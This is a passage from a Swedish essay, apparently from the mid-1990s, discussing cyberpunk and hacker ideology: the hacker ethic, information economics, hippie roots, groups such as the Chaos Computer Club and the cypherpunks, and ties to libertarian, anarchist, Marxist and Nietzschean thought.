således förkastligt. Den typ av information som hotar privatlivet (vad du har
för sexuell läggning etc) skall inte vara fri.
Det här mottot är kort och gott en förlängning av tryckfriheten som
uppstod med datorernas förmåga att reproducera information till obefintlig
kostnad.
Man kan spåra dessa tankar tillbaka till upplysningens idéer om bred
kunskap som ett sätt att förbättra och utveckla samhället. Skillnaden är att
man anser att även *ägd* kunskap; böcker och patent, urskiljningslöst skall
vara fria. Denna inställning är fullständigt främmande för alla de tre
statsmakterna, besatta av hunger efter makt, status och pengar som de alla är.
Begreppet "dela med sig" existerar inte i maktens korridorer. Idéellt
informationsutbyte - vem tjänar pengar på det?
_3. Misstro auktoriteter - främja decentralisering._
En hyllning till människans förmåga att ifrågasätta såsom central för all
utveckling. Decentralisering - små hemdatorer tillgängliga för alla istället
för stora myndighetsägda datasystem - många små företag istället ett fåtal
stora - ligger till grunden för hackarnas protester mot Microsoft m fl
företagsjättar och mediamoguler som tidningen Wired. Decentralisering, menar
man, ligger i informationsteknikens natur. Det ena mottot följer som en logisk
följd av det andra: auktoriteter är onekligen centraliserade. Mottot finns
inom såväl anarkismen som nyliberalismen och andra politiska ideologier och är
påtagligt hos de flesta subkulturer (t ex ravekulturen).
_4. Hackare bör bedömas efter sin hackarkonst, inte enligt suspekta kriterier
såsom betyg, ålder, ras eller social status._
Människan bör bedömas för vad hon presterar, inte för vad hon kan tänkas
prestera med utgångspunkt från social klasstillhörighet, klädsel, betyg, ålder
osv. Var och en som någonsin sett hur hierarkierna inom ett företag eller en
myndighet fungerar i praktiken förstår relevansen av detta kriterium. Detta är
givetvis ingen ny tanke, men de elektroniska medierna ger möjligheten att
nästan helt skärma av en människas yttre uppenbarelse genom textkommunikation.
_5. Datorer kan användas för att skapa konst och skönhet._
*Vilket Skulle Bevisas* - varje människa som sett de moderna konstverk, filmer
och den musik som skapats med hjälp av datorer torde inse det uppenbart
riktiga i detta antagande. Datorerna har i sig gett upphov till konstformerna
*demo* och *dataspel* (multimedia) vilket torde understryka datorns kapacitet
som kulturell katalysator. På 60- och 70-talen var det många som skrattade sig
fördärvade åt påståendet att datorer skulle kunna användas för att skapa
konst, och det är från den tiden kriteriet härhör. Den svenska
upphovsrättslagen slår dessutom fast att bara konstnärligt nyskapande
dataprogram skyddas av lagen, vilket innebär att en förskräcklig massa
affärsmjukvara från Microsoft, Novell och andra mjukvaruföretag är att
betrakta som konstverk.
_6. Datorer kan förändra ditt liv till det bättre._
Mottot säger med andra ord: hänge dig åt futurism. Det är upp till var och en
att själv bedöma detta. För den som hatar allt vad datorer heter torde det
vara ganska svårt att svälja. För en hackare är det självklart. Att datorer
generellt skulle göra livet bättre är en överdrift - i gulfkriget användes
datorer mest till att ha ihjäl människor med, och deras liv förändrades
knappast till det bättre. (Om de inte var trötta på det alltså.) Men var och
en får nog erkänna att det är ganska bekvämt att ha den där bankomaten på
hörnet att gå till när banken är stängd...
Som ni ser är information ganska centralt i dessa sex hackaretiska fundament.
Jag skall nu göra ett försök att förankra detta på någotsånär vardaglig nivå.
En allmän uppfattning om begreppet information är att det är någonting som
finns på papper. Detta har nu modifierats till att omfatta videokasetter,
disketter och CD-skivor. Vi talar om informationssamhället och tänker då på
datorer och dataregister.
För en cyberpunkare har begreppet en något djupare innebörd: för honom
innefattar information i princip *alla nervsignaler som når hjärnan*, kanske
rentav dessutom delar av *hjärnans processer i sig*, och det är en
förskräcklig massa mer. För honom är den perfekta informationskällan inte en
dator i vanlig mening, utan helst en tänkt förlängning av konceptet virtuell
verklighet, där all information från omgivningen kan syntetiseras och lagras.
I Gibsons tappning kallas manicken för *Simstim-däck*, och det rör sig
givetvis om ren science fiction. Optimistiska bedömare anser att en sådan
klockren återgivning av verkligheten är möjlig tidigast om cirka 50 år. Jag
skall återkomma till virtuell verklighet i ett separat kapitel.
En cyberpunkare ser uppenbara brister i industrisamhällets sätt att tänka
och den ideologi som härstammar därur. Våra vanligaste ideologier som
socialism, liberalism, konservatism etc, grundar sig på ett ganska smalt
ekonomiskt synsätt. Debattörerna är oerhört fixerade vid *produktionskrafter*,
*arbete* och *kapital*. Vårt valutasystem, som ju utgör grunden för all
samhällsplanering, baserades före industrialiseringen på guld.
Industrisamhällets valutasystem vilar på produktionskrafter, och det
återspeglas i politiken, speciellt i kommunal- och landstingspolitik. För den
fyrtiotalistgeneration (de sk "baby-boomarna") som nu sitter vid makten är
detta A och O för allt politiskt arbete. Ekonomi, ekonomi och åter ekonomi,
arbetstillfällen, kommunikationer och bidrag kan diskuteras *i det oändliga*.
Miljöfrågor och värderingar kommer först i andra eller tredje hand. Det finns
en generation ute på taburetterna som fortfarande tror att vi lever i ett
alltigenom industriellt samhälle, och att politikens viktigaste uppgift är att
säkra sveriges exportindustri. I själva verket befinner sig vårt samhälle på
gränsen till det rena *informationssamhället* - vad vi kallar för det
*postindustriella *samhället.
Cyberpunkaren ser den här hållningen som direkt fjantig. En sedel är inte
mer än ett papper. Det är den objektiva *information* man kan få från den. Den
är ett papper med några symboler på. Ett papper kan inte devalveras, ätas
eller bytas mot något annat om inte alla, eller nästan alla människor
accepterar dess fiktiva värde. Cyberpunkaren accepterar det *inte*, för i
informationssamhället kommer valutan inte att baseras på varken guld eller
produktionskrafter, utan ren *information*, eller om man så vill: tillgång
till kunskap, och möjligheten att utnyttja den.
Då vårt samhälle av idag befinner sig på randen till detta blir det allt
viktigare att utföra teoretiskt arbete och allt mindre viktigt med materiellt
bundet kapital och industrier. (Vilket helt enkelt innebär att cyberpunkarna,
som behärskar datanäten och har många sympatisörer bland de systemansvariga på
nästan alla nyckelpositioner, kommer att ta makten från politikerna - om dessa
inte tänker om.)
Redan nu har det dykt upp banker som handlar med *virtuell valuta* över
datanätverken, exempelvis holländska _Digicash_ eller _First Virtual_. Valutan
är ännu inte konvertibel med vanliga valutor som dollar och kronor, men den är
högst funktionell och används vid handel med ren information. Den fungerar så
att du sätter in några hundra på ett helt vanligt konto i banken varefter
dessa pengar kan distribueras över Internet med ett speciellt program. De kan
även återlösas till vanliga pengar via samma bank. Det är alltså fullt möjligt
att bedriva informationshandel med påhittade pengar som mellanled redan idag.
Det är bara en tidsfråga innan beskattning och liknande frågor aktualiseras,
och då är vi inne i informationsekonomin ordentligt. I USA har man t o m
myntat begreppet *Infonomi* (eng: *Infonomics*) som en beteckning på det nya
valutasystemet.
Samtidigt lanserar kreditföretagen de sk *smarta korten* (eng: *smart
cards*) som kan användas för att handla varor med enligt samma princip som
telefonkorten: köpen registreras helt elektroniskt och innehållet på ditt kort
försvinner på samma vis som på ett telefonkort. Speciellt kommer dessa att
användas på varuautomater och liknande, t ex för att köpa bensin. Det fungerar
*inte* som ett kontokort; du behöver inte slå in någon kod för att använda
kortet, det är bara att stoppa i och handla. Rätt hanterade kan sådana smarta
kort vara betydligt säkrare än vanliga sedlar och i princip omöjliga att
förfalska. Fel hanterade kan de bli lika lätta att förfalska som
telefonkorten.
_Makten Över Informationen_
Information är alltså inte bara det som matas in i hjärnan, utan också det
som lagrats där, inklusive vår världsuppfattning och de *arketyper* som vi
föds med och som hjälper oss att göra världen begriplig. Tanken härstammar
från bl a Douglas Hofstadter.
De politiska cyberpunkarna säger: kopiera allt, stjäl all programvara och
all information du över huvud taget kan komma över, och kopiera den till så
många som möjligt. För till skillnad från produktionskrafter kan information
kopieras ohejdat, och därmed sprids makten över framtida valutasystem ut över
alla som har tillgång till informationen. Översatt till gammalt tänkande blir
det såhär: *"okej, jag kan inte ta över din fabrik (produktionsmedlet), så jag
tar och kopierar den. Sen ger jag kopior till alla mina kompisar osv och sen
kan du stå där med din fabrik och tro att du är något"*. Produktionsmedlen
tappar på så vis sitt inneboende värde och en ekonomisk jämlikhet kan uppnås.
Cyberpunkarna menar till och med att informationskanalerna genom de höga
teletaxorna hålls otillgängliga för allmänhet och ungdomar just därför att
förståelse människor emellan inte gynnar de stora ekonomiska makthavarna. Om
telebolagen sänkte priserna på internationella kommunikationer skulle den
ömsesidiga förståelsen i världen bli alldeles för stor för att vara lönsam.
Det skulle också vara därför företagen så gärna vill ta makten över Internet,
som ju oförskämt nog erbjuder internationell kommunikation utan någon större
kostnad. Människor skulle i ett alltför kommunikativt samhälle inte göra
tillräcklig *nytta* utan enbart se till att de fick mat för dagen och ägna
resten av sin tid till sådant de tyckte var spännande tillsammans med andra
människor, istället för att *producera*. Låt företagstopparna kommunicera
internationellt men håll för guds skull de vanliga människorna borta från den
stora världen. Resonemanget är ideologiskt och i princip omöjligt att bevisa.
(Eller motbevisa.)
Ett annat exempel är att belysa redan befintliga ekonomiska motsättningar
med cyberpunkens lampa: 1995 gnällde programvaruindustrin med Microsoft i
spetsen över att de förlorar så förskräckligt mycket pengar på piratkopiering,
och nu talar vi inte om några små hackare som sitter i en källare utanför
Stockholm med en PC, utan om hela nationer i orienten: Indonesien och
Bangladesh bland annat. I dessa länder ger man höga fan i andra länders
copyrightlagar och tillverkar därför kubikmetervis med piratkopierad
programvara. Det svinn detta ger upphov till uppskattas till sisådär 110
miljarder per år. Jag (och många med mig) måste erkänna att jag knappast
ligger sömnlös för att Bill Gates med några miljarder i personlig förmögenhet
inte får klämma de sista dollarna ur befolkningen i dessa U-länder. Detta är
knappast något enkelt moraliskt problem. Det handlar om global ekonomi och
rättvisa mellan länder. Vem programmerar vem? Vilket land har rätt att
bestämma ett annat lands ekonomiska värdighet?
Jag nämnde tidigare hur man på den sk *Scenen* bytte information mot
information - konstnärliga dataprogram och spel mot beundran. För en människa
med sådan bakgrund, som genom ett socialt spel i tonåren insett var de
grundläggande byggstenarna för vårt klassamhälle *egentligen* finns, är
cyberpunkideologin ett naturligt steg. Det uppenbara spel mellan individer med
allt vad det innebär av klasstillhörighet, politiker och direktörer är så
uppenbart likt det sätt på vilket scenen organiserade sig. Man inser att det
inte handlar om pengar, arbete och kapital - utan om informationshandel.
Status i form av klasstillhörighet, äganderätt, bostad - alla sociala symboler
- är inget annat än information. Att kontrollera informationskanalerna innebär
makt och därmed status. Det är inte svårt för en gammal hackare att bli en
smula cynisk.
Stora företag motarbetar enligt cyberpunken mänskliga relationer. Företag
tänker inte som människor. I och med att makten är delad och de styrande
männen och kvinnorna intrigerar istället för att titta utåt kan ett företag
uppträda fullkomligt känslolöst. Ingenstans är känslan av en intelligens som
överstiger människans så påtaglig som när man möter ett företag ansikte mot
ansikte. Ingen av de anställda på ett stort företag känner sig det minsta
ansvariga för företagets handlingar. Maktpyramiden inom ett större företag är
lika effektiv på att ta bort de anställdas samvete som en militär organisation
är på att ta bort soldaternas känsla av ansvar för sina handlingar. Företagen
är snabbare, rikare och mer effektiva än världens regeringar. Denna syn på
företag som komplexa individer bortom mänsklig kontroll är en gemensam nämnare
för såväl cyberpunkideologi som litteratur och film inom detta område.
En annan sida hos cyberpunken är vad man med Ladislaus Horatius d.y:s ord
skulle kalla *neoterisk*, dvs evigt framåtsträvande med inställningen att allt
nytt är bra. Speciellt tydligt märks det hos en del teknikfetischister som
prisar allt det som den litterära cyberpunken vill varna för. Genetik, droger,
manipulation av sinnesintryck och nu senast nanoteknik. (Nanoteknik är en
teknik som innebär att man konstruerar föremål genom att manipulera enskilda
atomer. Forskare på IBM lyckades med denna teknik skapa en IBM-logotype av
uppradade xenonatomer.) Det mest skrämmande med denna inställning är att dessa
fanatiska neoteriker är fullkomligt medvetna om hur otrevligt och
odemokratiskt ett sådant samhälle skulle bli, men förespråkar det ändå -
eftersom det placerar dem själva bland vinnarna.
Cyberpunkideologin förknippas framför allt med _Michael Synergy_
(formodligen en pseudonym), en medarbetare på cyberpunktidningen *MONDO 2000*.
Bland tänkarna på MONDO 2000 märks även den excentriske författaren och
LSD-profeten _Timothy Leary_, både älskad och hatad för sina kontroversiella
tankar redan på sjuttiotalet. Det skall dock betonas att de flesta
cyberpunkare anser MONDO 2000 vara en tidning som bara nosar efter kitsch och
nyheter för att verka så häftig och inne som som möjligt. Tidningen har dock
gett rörelsen ett ansikte utåt. Den riktiga politiska cyberpunkrörelsen finns
i datanätverken, med utgångspunkt från nätverket *The Well* i San Francisco,
och utvecklas i en evigt pågående diskussion mellan användarna. Den mest
namnkunnige tänkaren i detta lag torde vara _John Perry Barlow_. *Apropå San
Fransisco...*
_Hippier och Yippier_
Cyberpunkideologin har rent värderingsmässigt drag av såväl anarkism,
socialism och nyliberalism som amerikansk hippie- och yippiekultur från
universiteten Berkely och Stanford i San Francisco. Jag har redan tidigare
nämnt yippier, men det kan vara på sin plats att nämna även hippiekulturen,
eller det som vi i Sverige förknippar med "progg". Denna kultur är ett av
fundamenten för den cyberpunkideologi som sprids över datanäten med San
Francisco som utgångspunkt.
Hippiekulturen i USA var dels grundad i en kamp för mänskliga rättigheter,
om svarta och vitas lika värde och mötesfrihet mm, dels var det en förlängning
av beatnikkulturen från 50-talet, bland hippierna framför allt företrädd av
poeten _Allen Ginsberg_, en vän till Jack Kerouac och William S Burroughs.
Ginsberg hade kommit i kontakt med psykologen Timothy Leary 1960 och de båda
blev förgrundsfigurer i den framväxande hippierörelsen. 1962 släpptes _Ken
Keseys_ bok *Gökboet*, en roman som skrivits under kraftigt inflytande av
Peyote och LSD._ _Kesey arrangerade offentliga LSD-partyn, sk *acid-tests* dit
folk kunde komma och testa LSD gratis. (Det var fullt lagligt att tillverka
och sälja LSD i USA fram till 1965.) En rockgrupp som brukade spela på Keseys
syrapartyn var _Grateful Dead_, en grupp som senare blev synonym med en
musikstil som kallas *syrarock* (eng: acid rock) och som senare blev
förebilder för olika hippierockare som exempelvis _The Doors_ och _Jefferson
Airplane_.
Hippierna predikade sitt kärleksbudskap fram till 1970 då de mer våldsamma
yippierna tog över. Sommaren 1967 räknas som en kulmen, den sk
*kärlekssommaren*, när Grateful Dead, Simon & Garfunkel, The Who och Jimi
Hendrix spelade på en festival i Monterey som filmades och spreds över hela
världen. Samma år släpptes de odödliga låtarna* Light My Fire* av _The Doors_,
och *A Whiter Shade of Pale* av _Procul Harum_. Det kunde bara gå utför.
I Sverige kallar vi våra hippier för proggare, och de är (var?) mycket mer
kommunistiska än sina amerikanska anfädrer. Runt 1967-68 kulminerade vågen med
protester mot det mesta och den generation som var mellan 15 och 25 år då och
som nu (1995) är mellan 40 och 50 ser gärna tillbaka på tiden som en
guldålder. Huvudtanken bakom hippierörelsen var protesten mot det pågående
kriget i Vietnam och organisationer som Svenska Freds- och
Skiljedomsföreningen växte sig under den här perioden enormt stora.
Musikgrupper som Nationalteatern eller Hoola Bandola Band blev
generationssymboler. Timothy Leary var inte okänd, och LSD, Hasch och
Marijhuana var inte alls ovanligt bland ungdomar. Efterhand distansierade sig
den svenska delen av rörelsen från händelserna i San Fransisco eftersom den
renodlat kommunistiska delen av rörelsen inte ville förknippas med idéer från
USA. Detta fick till följd att vi efter slutet på 60-talet inte hörde av San
Francisco på ett tag.
I den mån vi någonsin såg några av 70-talets yippier i Sverige var de
uppblandade med den centraleuropeiska anarkismen med autonoma grupper i
Holland och Tyskland (sk *provos*, därav den försvenskade beteckningen
*proggare*), eller BZ i Danmark. Svenska proggare var dock lite rädda för den
nya aggressiva attityden; 1967 hade man ockuperat Åhléns leksaksavdelning i
protest mot krigsleksaker - en typisk manifestation av den auktoritära men
samtidigt pacifistiska icke-vålds attityd som rådde inom rörelsen. Man tycks
ha menat att man skulle använda aggressivitet mot våld, en uppenbart paradoxal
inställning som inte många förstod sig på. _Charles Mansons_ rituella mord
1969 med avlägsen anknytning till hippierörelsen, och yippiernas våldsamma
förstörelselusta, blev för mycket för sveriges lena mysproggare.
Snarare än att anamma yippiernas nya, aggressiva form av anti-allting till
skillnad från den tidigare anti-krigsrörelsen skar Sverige av sig från världen
och ungdomskulturen gick in i en depression. Istället för att vara glada och
sprida kärleksbudskapet eller ens bli lite sunt förbannade på allting som
yippierna, låstes nyckelbarnen in i betongförorter där de lyssnade på Pink
Floyd och Nationalteatern och sniffade thinner.
Proggarna satt hemma och tittade på TV, lärde sig att hålla käften och
vara nöjda och hjälpa till att bygga folkhemmet istället för att förändra
världen utanför Sveriges gränser. Eftersom vietnamkriget var över började
några protestera mot kärnkraft istället för mot krig. Ända sedan dess dras vi
med folkrörelser som måste ha något att protestera mot för att överhuvudtaget
fungera. Hursomhelst: de värderingar och livsideal som fanns inom
hippie/yippie-rörelsen har till viss del överförts till cyberpunken.
En del skulle säkert påstå att hela hippiegrejen dog med 60-talet. Även om
detta till viss del gäller för Sverige, är det en helt annan sak med USA, där
konflikten gick mycket djupare och hade stort inflytande över hur det
amerikanska samhället ser ut idag. I USA bottnade dessa protester i
rasförtryck och politiska förföljelser som vi i Sverige aldrig sett maken
till. Många medelålders amerikaner vet vad det innebär att slåss för
medborgerliga rättigheter, och att yttrande- och rörelsefrihet inte är några
självklarheter. I och med att USA:s större BBS:er och konferenssystem som *The
Well* i San Francisco kryllar av gamla hippier och yippier kommer alla
Internetanvändare förr eller senare i kontakt med en hippiekultur som visar
såväl militanta, drogliberala som pacifistiska drag, men som framför allt
värnar om medborgerliga rättigheter.
Vad många europeiska iakttagare av denna kulturform säkert missat, är den
*kritik mot makten*, som döljer sig hos de viktigaste ideologiska företrädarna
för hippierörelsen. Det är framför allt Burroughs och Leary som står för denna
kritik. Leary har en av de viktigaste poängerna i sin bok *The Politics of
Ecstasy*, där han menar att makten ständigt matar medborgarna med
lättbegripliga budskap för att hindra dem från att ifrågasätta. Han menar att
den kraftiga lagstiftningen mot, och fördömandet av, psykedeliska droger
handlar mer om makt över människans psyke än den eventuella farligheten hos
drogerna själva.
_Hjältar och Skrävlare_
En del cyberpunkare, framför allt hackare, vill gärna göra sken av att de
distribuerar ljusskygg information till bland annat _Greenpeace_ (en av
världens mest politiskt korrekta organisationer, vilket tydligen kan få vilket
hjärta som helsta att smälta), men frågan är hur mycket dessa moderna hackare
*egentligen* förmår; hackare har nämligen en tendens att utmåla sig själva i
så god dager som möjligt och hänfaller inte sällan åt rent skryt.
Det är emellertid ett faktum att hackarna i _Chaos Computer Club_ i
samband med Tjernobylolyckan spridde ut uppgifter om det västtyska
kärnkraftsprogrammet som regeringen själv inte ville släppa ut. All denna
information hade man kommit åt genom att att göra olagligt intrång i
regeringens databaser. Men var det *rätt* eller *fel?* I laglig mening var det
olagligt, men ur moralisk synpunkt? Jämför exempelvis med grävande
journalistik som gräver för djupt och hamnar på fel sida lagen.
Dataintrång för det allmännas bästa har även skett i Sverige: BBS:en
*Ausgebombt* i Vänersborg som fick en del uppmärksamhet i media, penetrerades
och undersöktes av en hackare, varefter basens innehåll kunde avslöjas. Basen
skall förutom den vanliga propagandan, knarkrecepten och bombritningarna även
ha innehållit grov barn- och våldspornografi samt dödslistor och rasistisk
propaganda. Detta hade förmodligen inte kommit upp till ytan utan hjälpen från
hackaren. (Vem som egentligen lejde hackaren är däremot höljt i dunkel, han
gjorde det tydligen inte på eget initiativ. Källa: Elvsborgs läns allehanda
augusti 1993.)
Andra namnbekanta cyberpunkare hittar man i _Internet Liberation Front
_(_ILF_) som tydligen har försökt utöva terroraktioner på Internet för att
behålla den anarkistiska strukturen på nätet och hålla de inflytelserika
företagen så långt borta som möjligt. Den enda som drabbats av ILF är
journalisten _Joshua Quittner_ som skrev en bok om hackargruppen *Masters of
Deception* med samma titel. Antagligen var hackarna inte nöjda med hur de
porträtterades i boken, och det hela är snarare att betrakta som en personlig
vendetta än en allvarligt menad politisk aktion. Terrorn bestod i att
Quittners elektroniska postlåda och hela hans lokala Internet-leverantörs
dator dränktes med information tills de kroknade. Dessutom vidarekopplades
hans telefon till en röstbrevlåda som öste ur sig oförskämdheter. Strax
efteråt publicerade tidningen *Wired* ett utdrag ur boken, varefter även de
fick uppleva informationsterrorn. Därav publiciteten.
Även om vi i Sverige kanske inte upplevt så många fall av rena
cyberpunkaktioner, så har en del cyberpunkrelaterade *brott*, där små grupper
tekniska ljushuvuden lagt ned massor av arbetstimmar på att konstruera
tekniska hjälpmedel för informationsspridning: de piratdekodrar för kabel- och
satellit-TV som en del hackare tillverkar är ett exempel, eller falska
telefonkort.
Sådana hackare tänker kanske inte i första hand ideologiskt, men man kan
som sagt ana vissa gemensamma värderingar: Alla satellitsändningar väller ju
in över oss - men apparaten som behövs för att *tolka* dem vill kabelföretag
och TV-stationer belägga med monopol. Jag skall alltså inte få bygga en egen
hur som helst. Individens frihet blir då begränsad till förmån för stora
mediaföretag - en ofrihet som kräver sitt uppror. Kanske är det rentav så att
hackarna genom att testa var gränserna går visar för oss att de här gränserna
verkligen finns och att det inte bara rör sig om en formsak.
En underlig egenskap med dessa hackare är att de i stort sett alltid står
upp för sina aktioner och inte betraktar sig som traditionella brottslingar.
När de grips för sina brott brukar de prata om att *hjälpa* de drabbade
företagen att hitta sina säkerhetsbrister. *"Vi ville visa att systemet var
osäkert"* är en av de vanligaste förklaringarna. Vi ser i dem Nietzsches
övermänskliga natur som ser det som sin rättighet att bryta reglerna för att
samhället skall ha en chans att utvecklas.
Man måste också skilja på de som bygger piratdekodrar eller telefonkort
för att *tjäna pengar* på dem och de som mest gör det för utmaningens skull,
för att befria informationen. Den som tillverkar piratdekodrar enbart för att
göra sig en hacka på försäljningen är inte ett dugg bättre än vanliga
egoistiska falskmyntare. Men sedan finns det de där andra - de som bara vill
sprida informationen. Hackarens rebellrörelse är född - informationen skall
vara tillgänglig för alla; man säger till och med att den har en inneboende
längtan efter frihet: _Information WANTS to be free!_
När man ser hackarna ur det här perspektivet, att de försöker förmedla
information och rent av påstår att den inte kan ägas, precis som _Sitting
Bull_ en gång påstod att land inte kunde ägas, och pengar inte gick att äta,
börjar man kanske förstå var det sunda ligger i hackarnas cyberpunkideologi.
Information - och på ett sätt *är* allt information - kan inte ägas. Inte
heller land, arbetskraft eller kapital. Ideologiskt är det inte mycket nytt,
bara ett nytt synsätt.
Hackarnas ideologi syftar inte till att skapa någon teknokrati där de
största genierna härskar. Den vittnar bara än en gång om individens längtan
efter befrielse från maskineriet - och en djupt liggande humanism. Vi omges av
ett system av regler som begränsar vårt handlande på ett ibland ganska absurt
sätt. Hackarna visar på att systemet existerar och att det varken är säkert
eller oföränderligt. Kanske är det en form av anarkism, kanske är det bara
någon djupt liggande längtan efter frihet, något inneboende i den mänskliga
naturen, som tittar fram. Ett frö till en ideologi som givetvis är ett enormt
hot mot de värderingar och ekonomiska system som håller samman vårt samhälle.
Bland cyberpunkinspirerade aktionsgrupper märks även *cypherpunkarna
*(kallas också *kryptoanarkister*). Den lustiga ändringen i stavningen är inte
slumpmässig utan anspelar på det amerikanska ordet för chiffer = *cipher*.
Till viss del återknyter det kanske också till de tidigare nämnda phreakarna,
som i bland ansåg att teletrafiken borde vara gratis, och utforskandet av
telefonsystemet tillåtet. (Telefoni är ju också informationsutbyte.)
Cypherpunkarna är mest intresserade av kryptering och har framför allt gjort
sig kända för att distribuera programmet *PGP (Pretty Good Privacy)*, ett
*krypteringsprogram* som kodar data så att inte ens den amerikanska
säkerhetstjänsten kan dechiffrera den. Den politiska makten fråntas därmed den
sista möjligheten att fullt ut kontrollera vad för slags information som
sprider sig i datanätverken, vilket ju är precis vad cyberpunkarna vill uppnå.
Bland dessa handlingskraftiga cypherpunkare märks bland annat _Eric Hughes_
som driver frågorna på Internet.
Cypherpunkarna försvarar också rätten till anonymitet på nätverken. Deras
politiska förbilder finns, liksom inom flera delar av cyberpunken, i den
amerikanska *libertarianismen*.
_Ideologiskt Arv_
Om vi ger oss på att försöka analysera vad cyberpunkideologi egentligen är
kan vi börja med libertarianismen. Detta är en radikal nyliberal ideologi som
fordrar maximal frihet åt individen, och ställer individens rätt att tänka,
tala eller konspirera (om hon så önskar) i centrum. De menar att det moderna
samhället alltför mycket begränsar individens frihet. En tongivande filosof är
_Robert Nozick_, och medlemmarna i det amerikanska libertarianistiska partiet
består mest av gnälliga småföretagare. (Eller *urbaniserade småborgare* om vi
skall vara formella.) I Sverige är nyliberalerna i allmänhet yngre, med
anknytning till *Frihetsfronten* elle *Fria Moderata Studentförbundet*, som i
praktiken fungerar som ett slags idéfarmer för Moderata Samlingspartiet. En
annan filosofi som är mycket populär bland nyliberaler är författarinnan _Ayn
Rands_ *objektivism*.
Det individcentrerade tänkandet inom nyliberalismen har haft avgörande
inflytande på cyberpunken som ideologi. Den mest markanta skillnaden är att
medan nyliberalismen ser det kapitalistiska systemet som ett neutralt
instrument att befria individen från massans kontroll (arbeta och konsumera så
blir du lycklig utan staten), struntar cyberpunken totalt i det kapitalistiska
systemet. Cyberpunken bortser i stort sett helt från de materiella friheterna
och ägnar sig åt de mentala. Som verktyg för att befria människans själ ser
man informationstekniken, vad som befriar henne materiellt är mindre
intressant. Till skillnad från nyliberalerna anser cyberpunkarna att företag
är farliga maktfaktorer som lika väl som staten kan få för sig att begränsa
medborgarnas frihet, oavsett samhällsskicket i övrigt.
I övrigt kan man märka starka influenser från *anarkismen*, speciellt
bland hackare och *teknokrater* (som jag skall ta upp lägre fram).* Hands-on
imperativet* får sägas vara hämtat från anarkismen; att man inte skall
acceptera auktoritära gränser för sitt handlingsrum. Hos hackarna är detta
knutet till sammanslutningar av fria människor i _Peter Krapotkins_ anda.
Jämför till exempel de små grupperna på högskolorna, *Scenen* bland
hemdatorentusiasterna och de fria diskussionsgrupperna på Internet; likheten
är slående med de fria grupper i samverkan som Krapotkin förespråkade.
Regeringar, företag och enorma organisationer står i bjärt kontrast till
detta. Den närmaste ideologiska släktingen är förmodligen *syndikalismen* som
liksom nyliberalismen betonar individens förmåga.
*Att all information borde vara fri* är ett nästan rent socialistiskt
inslag i cyberpunken, om man med detta menar att det är fel att bygga murar
kring kunskap eller att tjäna pengar på information. Om man avser tryckfrihet,
är mottot grundläggande inom såväl liberalismen som reformsocialismen.
*Tillgången till datorer, eller vad som helst som kan lära dig något om hur
världen fungerar borde vara obegränsad och total* - också detta är ett mycket
socialistiskt motto. Det innebär (som jag ser det) även att det borde vara
skattefinansierat och därmed gratis att telefonera.
Redan efter dessa inledande exempel ser vi tydligt det kluvna ideologiska
arvet inom cyberpunken. Den är i stora delar oförenlig med vanliga ideologier,
samtidigt som den är anpassningsbar eftersom den bara intresserar sig för
information.
Om vi jämför med _Karl Marx_ samhällsteorier ser vi tydliga likheter. Marx
menade att ett samhälles ekonomi utgick från de som gjorde *arbetet*: I
antikens Grekland var det slavarna, under medeltiden bönderna och de livegna
och i industrisamhället arbetarna (proletärerna). Genom att detta
organiserades i ett kapitalistiskt system födde de lägre klasserna de
överliggande. Innan vi kan förstå vad som menas med detta måste vi genomskåda
myten om arbetaren: vi har lite var till mans bilden av en arbetare som den
som utför tungt och slitigt jobb för taskig lön. Detta må ha stämt bra in på
industrisamhället, men är mindre tillämpligt på informationssamhället.
Arbetaren är och förblir den som hamnar *i botten på maktpyramiden*, och
som genom ett subtilt mönster av sociala förhållningsregler och inrutade
arbetsuppgifter i möjligaste mån hålls borta från allt avancemang uppåt. I vår
marknadseknomiska bild av världen har vi nära nog börjat betrakta det som en
naturlag att hierarkier där de undre föder de överliggande alltid uppstår och
alltid *måste* existera, och på det viset upprätthålls systemet från
generation till generation. Pragmatiker som jag själv inser att så inte
behöver vara fallet, men låt oss för ett ögonblick utgå från att teorin om
maktpyramiden är solid och kommer att finnas kvar ännu ett tag in i framtiden.
Om vi nu applicerar detta på ett informationssamhälle, var hamnar vi då?
Jo, *arbetet* utförs av terminalslavar, programmerare och andra som förmås
jobba hårt med datorerna medan bourgeosin (överklassen och den övre
medelklassen) sköter alla de slicka och roliga jobben, samt håvar in stålarna.
För att skydda sina investeringar måste bourgeoisin bygga murar runt sin
information och skydda den från att hamna under arbetarnas kontroll. Att i ett
sådant läge fordra informationens frihet måste betraktas som synnerligen
socialistiskt. Att piratkopiera dataprogram i stor skala blir en potentiell
revolution.
Där arbetarna tidigare lurades bort från sin insikt om hur världen
egentligen fungerar med hjälp av religion, luras dagens bourgeoisi med spöken
som *marknaden* och *nationalekonomin*. (Tidigare betonade man även moral och
rättskänsla, något som fallit platt till marken efter att det sena 80-talet
visade att bourgeoisin i princip saknade sådant själv.)
Slutligen har vi speciellt bland de illegala hackarna som jag nämnt, ett
starkt inflytande från _Nietzsche_ med tankar om att ett felaktigt system
måste rivas ned innan ett nytt (hos Nietzsche kallat *övermänniskan*) kan
byggas. Detta inflytande är så starkt att cyberpunkare ibland kallas
*Tekno-Nihilister*, vilket dock är en grov generalisering. Med Nietzsche i
ryggen kan hackarna motivera sig för att riva ned säkerhetsbarriärer inom
såväl telefon- samt datanät för att på så vis vidareutveckla tekniken och
därmed hela informationssamhället. De menar att de sjuka delarna av systemen
måste förstöras för att möjliggöra ett livsvärdigt informationssamhälle. Dessa
tankar kan man rent allmänt inte förneka; det är uppenbart att
säkerhetsrutinerna har blivit bättre delvis *tack vare* hackare, och att
samhället därigenom skyddats mot tänkbara angrepp från organiserad
brottslighet som exempelvis maffior. Svenska företag har vid flera tillfällen
informellt använt sig av hackare för att utveckla sina säkerhetssystem. Jag
skall längre fram visa att polisen och militären gör detsamma.
*"Du kom dem nära och gick dem förbi: det förlåter de dig aldrig.* (...)
*De korsfäster gärna den som uppfinner sin egen dygd."*
(Ur: *Sålunda talade Zarathustra* av _Friedrich Nietzsche_)
*"Ja, jag är en brottsling. Mitt brott är nyfikenhet. Mitt brott är att
jag dömer folk efter vad de säger och tänker, inte efter vad de ser ut att
vara. Mitt brott är att jag är smartare än er, något ni aldrig kommer att
förlåta mig." *
(Ur: *Phrack* #7, *The Conscience of a Hacker* av _The Mentor_)
En rolig vinkling på det hela är att medan socialismen fordrar frihet åt
produktionsmedlen (fabrikerna till folket), och liberalismen fordrar frihet åt
tanken (tryckfrihet) blir detta i informationssamhället i princip en och samma
sak. Cyberpunkarna kräver frihet åt informationen. John Locke, en liberal
